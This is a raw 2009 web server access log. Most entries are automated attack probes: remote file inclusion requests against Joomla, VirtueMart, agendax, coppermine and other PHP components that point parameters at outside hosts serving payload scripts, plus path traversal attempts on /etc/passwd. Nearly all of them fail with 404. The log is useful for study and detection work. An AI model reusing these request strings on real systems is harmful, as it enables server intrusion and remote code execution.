88.84.128.40 - - [25/May/2009:01:27:25 -0400] "GET /logs/error_log.Q108053100//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:27:25 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:27:26 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
88.191.103.144 - - [25/May/2009:01:28:01 -0400] "GET /logs/access_log.Q109051000//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:28:01 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:28:02 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
70.38.31.50 - - [25/May/2009:01:28:08 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:01:28:08 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
70.38.31.50 - - [25/May/2009:01:28:08 -0400] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
116.50.163.164 - - [25/May/2009:01:28:47 -0400] "GET /logs/error_log.Q109051000/include/functions/function_rex_mquotes.inc.php?REX[INCLUDE_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
209.59.12.99 - - [25/May/2009:01:30:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.52.167.208 - - [25/May/2009:01:30:43 -0400] "GET /logs/access_log.Q108122000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
208.52.167.208 - - [25/May/2009:01:30:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
78.40.224.155 - - [25/May/2009:01:31:07 -0400] "GET //param.peoplebook.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:31:07 -0400] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:31:09 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:31:09 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:31:13 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:31:15 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:31:58 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:31:58 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:31:58 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:32:03 -0400] "GET //param.peoplebook.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:32:03 -0400] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:32:06 -0400] "GET /logs/access_log.Q109051000//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:32:06 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:32:06 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
66.249.72.114 - - [25/May/2009:01:32:18 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0044F74B09A0C400F2DB049+WSEQ(S0060):1+OUITEM(A0200):05560501 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.40.224.155 - - [25/May/2009:01:32:35 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:32:35 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:32:35 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:33:32 -0400] "GET /logs/access_log.Q109051000//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:33:33 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:33:33 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:33:39 -0400] "GET /logs/access_log.Q109051000//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:33:39 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:33:40 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
78.40.224.155 - - [25/May/2009:01:34:41 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:34:51 -0400] "GET //vwar/backup/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
67.15.188.3 - - [25/May/2009:01:34:51 -0400] "GET /logs//vwar/backup/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
67.15.188.3 - - [25/May/2009:01:34:51 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
88.191.103.144 - - [25/May/2009:01:35:10 -0400] "GET /logs/error_log.Q108053100//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:35:10 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:35:10 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
78.40.224.155 - - [25/May/2009:01:35:14 -0400] "GET /logs/access_log.Q109011800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:01:35:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.50.3 - - [25/May/2009:01:35:20 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:35:20 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:35:22 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:35:37 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:35:38 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:35:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:35:52 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
59.103.90.91 - - [25/May/2009:01:36:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.103.90.91 - - [25/May/2009:01:36:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.15.188.3 - - [25/May/2009:01:36:09 -0400] "GET /logs/access_log.Q109051800//vwar/backup/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
222.236.44.69 - - [25/May/2009:01:36:41 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 289 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:01:36:41 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
222.236.44.69 - - [25/May/2009:01:36:41 -0400] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://feiwu-au.tw/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
78.40.224.155 - - [25/May/2009:01:36:43 -0400] "GET /logs/access_log.Q109011800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:37:27 -0400] "GET /logs//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:37:27 -0400] "GET //vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:37:27 -0400] "GET /logs/access_log.Q108091400%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:37:30 -0400] "GET //vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:37:30 -0400] "GET /logs//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:37:30 -0400] "GET /logs/access_log.Q108091400%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:37:45 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:37:45 -0400] "GET //skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:37:45 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:37:50 -0400] "GET //skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:37:50 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:37:50 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:01:37:53 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:01:37:53 -0400] "GET /logs/error_log.Q108121200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:01:37:53 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:01:38:12 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:01:38:12 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [25/May/2009:01:38:12 -0400] "GET /logs/error_log.Q108121200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
59.103.90.91 - - [25/May/2009:01:38:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.103.90.91 - - [25/May/2009:01:38:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.191.103.144 - - [25/May/2009:01:38:55 -0400] "GET /logs/access_log.Q109013000//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:38:55 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:38:56 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
67.15.188.3 - - [25/May/2009:01:39:03 -0400] "GET /logs/access_log.Q109051800%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:39:18 -0400] "GET /logs/access_log.Q109051800%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:39:37 -0400] "GET /logs/error_log.Q108053100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:39:38 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:39:38 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.825"
65.23.158.226 - - [25/May/2009:01:39:43 -0400] "GET /logs/access_log.Q109050300%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:39:44 -0400] "GET /logs/access_log.Q109050300%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:40:00 -0400] "GET /logs/error_log.Q108051600//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.825"
209.59.12.99 - - [25/May/2009:01:40:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.182.143.50 - - [25/May/2009:01:40:43 -0400] "GET //vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:01:40:43 -0400] "GET /logs/access_log.Q108091400%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:01:40:44 -0400] "GET /logs//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:41:26 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:41:26 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:41:26 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:42:13 -0400] "GET /logs/error_log.Q108053100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:42:13 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:42:14 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
222.239.76.25 - - [25/May/2009:01:42:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:42:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:42:40 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:42:48 -0400] "GET /logs/access_log.Q109013000//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:42:48 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:42:48 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:43:01 -0400] "GET /logs/error_log.Q108051600//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
208.64.202.134 - - [25/May/2009:01:43:11 -0400] "GET //skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:43:11 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:43:11 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:43:13 -0400] "GET //skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:43:13 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:43:13 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:01:43:37 -0400] "GET /logs/access_log.Q109051800%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:44:01 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:44:34 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:44:52 -0400] "GET /logs/error_log.Q108052700//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.825"
